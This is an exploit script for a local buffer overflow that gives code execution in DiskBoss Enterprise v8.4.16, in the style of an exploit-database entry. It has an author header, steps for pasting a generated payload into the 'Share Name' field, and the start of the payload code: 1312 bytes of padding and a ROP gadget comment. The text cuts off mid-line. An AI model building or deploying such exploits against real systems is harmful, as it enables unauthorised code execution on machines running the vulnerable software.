#!/usr/bin/python #======================================================================================================================== # Exploit Author: C4t0ps1s # Exploit Title: DiskBoss Enterprise v8.4.16 Local Buffer Overflow(Code execution) # Date: 03-10-2017 # Twitter: @C4t0ps1s # Email: C4t0ps1s@gmail.com # Vulnerable Software: DiskBoss Enterprise v8.4.16 # Vendor Homepage: http://www.diskboss.com # Version: v8.4.16 # Software Link: http://www.diskboss.com/downloads.html # Tested On: Windows 10 x64 # # Code execution from the PoC of Touhid M.Shaikh: https://www.exploit-db.com/exploits/42917/ # # To reproduce the code execution: # 1. Click Server # 2. Click Connect # 3. In the "Share Name" field, paste the content of shareName.txt , And try to connect # #======================================================================================================================== import struct buff = "a"*1312 #push esp | pop esi | retn 4 buff += struct.pack("